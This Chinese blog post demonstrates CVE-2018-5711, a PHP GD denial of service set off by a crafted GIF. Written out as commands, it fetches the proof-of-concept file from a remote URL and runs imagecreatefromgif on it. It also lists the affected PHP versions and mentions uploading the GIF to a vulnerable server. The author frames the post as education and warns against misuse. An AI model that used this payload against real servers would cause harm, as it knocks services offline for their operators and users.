台湾黑客发现一张动图能宕掉一台服务器

  • 内容
  • 相关

华夏人才济济呀,台湾的黑客orange发现了一个漏洞,编号为CVE-2018-5711,这个漏洞能瞬间让支持php的服务器宕机,我用KALI 2017.3的虚拟机来演示一下。

一、检测我的虚拟机是否装有php-gd库

运行命令:php -m | grep -i gd

二、如果上图中没有出现gd,我们就需要装一下了

运行命令:apt-get install php-gd

三、生成恶意的gif文件

运行命令:curl -L https://git.io/vN0n4 | xxd -r > poc.gif

四、运行top命令看下我的CPU使用率

运行命令:top

五、测试恶意代码

运行命令:php -r 'imagecreatefromgif("poc.gif");'

CPU瞬间上升到了百分百,我想再运行一下top命令来个CPU对比图都做不到了,不得不重启我的KALI。

这个漏洞的影响版本范围如下:

PHP 5.0 < 5.6.33

PHP 7.0 < 7.0.27

PHP 7.1 < 7.1.13

PHP 7.2 < 7.2.1

如果服务器支持php-gd库的话,上传生成的poc.gif,服务器就宕掉了。最后我要郑重说下,这个漏洞肯定有的服务器还没有补,如果你去搞恶作剧的话,会给对方造成经济损失的,会违反国家安全法律,所以一定要在虚拟机里测试,明白这个漏洞的原理就行。

转载地址:https://www.test404.com/post-1512.html

本文标签:

版权声明:若无特殊注明,本文皆为《冷涵》原创,转载请保留文章出处。

本文链接:台湾黑客发现一张动图能宕掉一台服务器 - https://www.lenhan.cn/loophole/45.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

未显示?请点击刷新

评论

3条评论
  1. avatar

    淘宝直通车 Lv.1 uBrowser 6.2.4094.1 Windows 7 x64 Edition 回复

    尊敬的站长前辈,希望能换交换一个友情链接,我的网站 http://www.tbztc.top/ 【希望看到这条信息的其它朋友,也能找我交换友链,谢谢】

    湖北省 联通

    1. 冷涵 Chrome 71.0.3578.98 GNU/Linux x64 回复

      回复了淘宝直通车:已加贵站链接,麻烦您把本站链接加上

      广东省广州市 电信

    2. 淘宝直通车 Lv.1 uBrowser 6.2.4094.1 Windows 7 x64 Edition 回复

      回复了冷涵:感谢站长朋友,刚才我已经加上您的了!

      湖北省黄冈市 联通

00:00 / 00:00
顺序播放